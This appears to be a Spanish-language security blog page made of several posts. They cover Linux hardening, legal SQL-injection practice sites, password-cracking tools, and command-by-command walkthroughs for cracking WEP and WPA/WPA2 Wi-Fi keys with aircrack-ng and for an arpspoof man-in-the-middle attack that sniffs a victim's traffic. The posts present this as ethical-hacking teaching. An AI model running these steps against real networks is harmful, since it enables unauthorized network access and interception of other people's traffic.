Translate

sábado, 8 de octubre de 2022

Aseguramiento de Linux Workstation

Un Saludo; En principio quiero disculparme por dejar tanto tiempo abandonado mi blog; el trabajo, los viajes y mil cosas mas me ocuparon todo mi tiempo y no hice la pausa pra seguir con el, pero pues gracias a la solicitud de un amigo, @jmmejiav me he obligado a sentarme un momento y escribir estas lineas; (Prometo tratar de continuar haciéndolo) Como el Título dice, vamos a hablar del aseguramiento del Linux Workstation; (Sabemos que hay miles de sitios con informacion acerca del aseguramiento del Windows); Bien, vamos al grano: Podemos asegurar muy bien nuestro Linux Workstation con multiples herramientas y manipulaciones simples al Sistema Operativo; por ende voy a dividir el Post en 2 partes: La primera, vamos a hablar de lo que ya trae el Sistema Operativo como herramienta incorporada y que nos serviria para mejorar su seguridad, y la segunda, orientada a herramientas de terceros que podemos utilizar. Herramientas del Sistema Operativo: SE Linux; herramienta de detección automática de vulnerabilidades: Lynis;  Video de Youtube David Pereira  en donde explico cómo hardenizar Windows: Hardeniza con STIGs y SCAP . Quieres que detectemos tu superficie de ataque?; visita SecPro.

martes, 9 de junio de 2020

Sitios Para practicar SQLi de forma Legal (Inyección de SQL)

Sitios Para practicar SQLi de forma Legal (Inyección de SQL)

Esta es una peticion constante: Dónde puedo practicar mis habilidades de Hacking sin cometer un delito; aqui les dejo una lista de sitios para practicar SQL Inyection:



Espero les resulten útiles e interesantes!!!

Recuerden: Las personas son la Primera línea de Ciberdefensa!!! 

Saludos.

SecPro 

sábado, 27 de abril de 2013

Hacking Sin Misterios - Episodio 001 - Por que nos roban las Contraseñas tan facilmente?

martes, 16 de abril de 2013

Información y Enlaces del Podcast Hacking Sin Misterio - Episodio 001


Enlaces a Herramientas recomendadas
(Por seguridad para nuestros visitantes, todos nuestros links dirigen a los sitios web de los fabricantes)

  1. Wireshark: Herramienta de escucha de tráfico de red; uno de los mejores sniffers que existe. Descarga de Wireshark
  2. Httrack: Herramienta que permite descargar completamente un sitio web cualquiera. Descarga HTTRACK
  3. Netcraft: Herramienta que permite instalar una barra de herramientas en el Navegador Mozilla para poder detextar las paginas web falsas.  Descarga la Barra de Netcraft para Mozilla
  4. Phishtank: Sitio Web que permite consultar si un sitio web es real o no.  http://www.phishtank.com/
  5. Enlaces para probar que tan robusta es una contraseña:  
     6. THC Hydra: Herramienta para realizar ataques contra Claves o Contraseñas: Sitio Web Hydra

    7. Brutus AET2: Herramienta para realizar ataques contra Claves: Descarga Brutus  AET2
 

Glosario

Spam: Se llama spam, correo basura o mensaje basura a los mensajes no solicitados, no deseados o de remitente no conocido (correo anónimo), habitualmente de tipo publicitario, generalmente enviados en grandes cantidades (incluso masivas) que perjudican de alguna o varias maneras al receptor. La acción de enviar dichos mensajes se denomina spamming. La palabra spam proviene de la segunda guerra mundial, cuando los familiares de los soldados en guerra les enviaban comida enlatada, entre estas comidas enlatadas, estaba una carne enlatada llamada spam, que en los Estados Unidos era y sigue siendo muy común.(Tomado de Wikipedia)

Phishing:  Es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea1 o incluso utilizando también llamadas telefónicas. (Tomado de Wikipedia)

Si falto algún dato, por favor no duden en escribirnos en el Blog.


jueves, 14 de junio de 2012

Pentesting en redes con Seguridad WPA - WPA2

No aguanté la tentación y decidí incluir ahora las pruebas en una red de tipo WPA o WPA2;

Como hicimos previamente, es recomendable ofuscar o modificar la dirección MAC de nuestra tarjeta de red; para eso escribimos en una consola:
(el simbolo # es para indicar el prompt de nuestro BackTrack 5R2)

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
# airmon-ng start wifi0




Luego miramos que redes estan en el alcance:

# airodump-ng wlan0
# airodump-ng -c (channel) -w (capture file) --bssid (AP MAC) wlan0

Desplegar BSSID (AP MAC) y las Estaciones o dispositivos que estén conectados a la red (Client MAC)

# aireplay-ng -0 1 -a (AP MAC) -c (Client MAC) wlan0


Generamos la deautenticación; para este tipo de redes debemos deautenticar a algun dispositivo que ya este autenticado, y escuchar su saludo (Handshake) en donde estará la clave encriptada; Si es exitoso detener airodump y ejecutar aircrack

aircrack-ng -w (Diccionario.lst o similar) -b (AP MAC) psk*.cap

En esta técnica es indispensable contar con un buen  diccionario, de lo contrario no vamos a tener mucho éxito.
Espero que logren muchos hallazgos!!!

SecPro 

 

 

Pentesting en redes de tipo WEP

Sigo tratando de sacar tiempo para colocar información interesante;
El dia de hoy les traigo los pasos necesarios para hacer pruebas de penetración en una red con seguridad del tipo WEP - Wireless Equivalent Privacy.
Para este efecto, usaremos la version de Linux BackTrack 5R2; 

La primera parte es para encubrir nuestra dirección MAC, o si no encubrirla, ofuscarla tratando de mimetizarla como otro tipo de dispositivo o marca de dispositivo; muchas veces los routers tienen activada la función de Filtrado de MAC; tratando de evitar que un dispositivo que no se encuentre dentro de la lista de MAC autorizadas se conecte a la red; para este efecto, es decir cambiar nuestra MAC  utilizamos la herramienta macchanger; supremamente útil para estos casos.

En una consola o terminal ejecutamos:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0


Hasta aqui hemos cambiado la MAC de la tarjeta inalámbrica; ahora procedemos a buscar las redes:

# airodump-ng wlan0

Apretamos para detener push ctrl+c

Copiamos el BSSID de la red que queramos probar

# airodump-ng -c (numero del canal) -w wep123 --bssid (bssid) wlan0

mientras pwr sea más grande, mejor
el #Data debe ser alrededor de 20.000, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20.000 y al hacerlo ejecutamos:

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Y listo; si tenenmos suficiente Data, lo mas seguro es que podamos recuperar la clave de la red.
Espero que les vaya muy bien en sus pruebas.

miércoles, 13 de junio de 2012

Ataque de Hombre En El Medio (MITM) con ArpSpoof

La mayoría de estudiantes me pregunta como se puede lograr ver el tráfico de una máquina cualquiera; para eso existen diversas técnicas, desde troyanizar la máquina, reconfigurar el proxy de la víctima, hasta generar un ataque de Hombre en  el Medio.
Este ataque es de los más utiles debido a que no se requiere hacer absolutamente nada en la maquina que deseamos escuchar el tráfico;
Debemos tener en cuenta que en las redes interconectadas por switch solo el tráfico broadcast es el que llega a todas las máquinas, asi que si activamos un sniffer sin realizar un ataque de Hombre en el medio, vamos a ver únicamente este tipo de trafico, es decir consultas y respuestas ARP.

Para realizar esta prueba de concepto necesitamos:
  • Una Máquina corriendo Linux; preferiblemente BackTrack (Yo utilizo la version 5 R2)
  • Una Máquina que haga las veces de Víctima del Ataque
  • Las dos máquinas deben estar en la misma red y utilizar la misma puerta de enlace o gateway.

El Linux BackTrack (Una de mis Herramientas Favoritas) ya incorpora todas las aplicaciones que utilizaremos para este efecto; lo mas importante es que tengamos la suit dsniff; si usamos un Linux que no la tenga instalada, entonces simplemente podemos escribir:

root@linux:~# apt-get install dsniff

Una vez instalada la suite dsniff podemos comenzar.

Lo primero que debemos conocer es la dirección ip de la máquina víctima y su puerta de enlace;
con esta información

Como debemos estar en una Red Local, será muy facil el encontrar la IP de la maquina víctima, para eso tenemos herramientas excelentes como Nmap, Hping3, Genlist; si alguien necesita mas información sobre ellas, por favor escribame un mensaje y trataré de postear información util sobre ellas, y probablemente algunos links a libros indispensables.

Conociendo la IP de la victima, vamos a iniciar el envenenamiento de ARP (ARP Poisoning); para esto, lo primero que debemos hacer es activar el reenvío de paquetes en nuestro linux, de lo contrario cuando activemos el envenenamiento, los paquetes se quedarian en el BackTrack y no seguirian su destino hacia o desde la internet, lo cual resultaria mas bien en una Denegación de Servicio, tema apasionante que espero tratar en otra oportunidad.

Una imagen del envenenamiento seria:
                             




En donde el trafico que va desde y hacia Bob y Alice no viaja directo entre ellos sino que pasa por la maquina Attacker, de esta forma podemos hacer sniffing y ver todo su trafico.

Como decíamos debemos activar el Forwarding o reenvío de paquetes asi:


root@linux:~# echo 1 > /proc/sys/net/ipv4/ip_forward

El colocar en 1 el valor del archivo ip_forward indica al S.O. que active el reenvio, que por defecto viene desactivado.

Bien; ahora en la misma pantalla de Terminal, debemos escribir:

root@linux:~#arpspoof -i (Tu Tarjeta de red, eth correspondiente) -t (ip de la víctima ej. 10.0.0.7) (ip de la puerta de enlace ej 10.0.0.1).

Abrimos otra Terminal y escribimos:

root@linux:~#arpspoof -i (Interfase de red eth correspondiente) -t (Ip de la Puerta de Enlace ej. 10.0.0.1) (ip de la victima ej 10.0.0.7)

Activamos nuestro Wireshark en el BackTrack, lo ponemos a escuchar en la misma interfase que estamos utilizando para el envenenamiento; asi veremos todo el tráfico desde y hacia la víctima; todos los protocolos en texto plano como http, telnet, pop, smtp, ftp podran ser vistos sin problema;
Para el trafico encriptado, es decir htttps, podemos utilizar otra técnica que mas adelante en otro post explicaré.



Les deseo un Happy Ethical Hacking!!.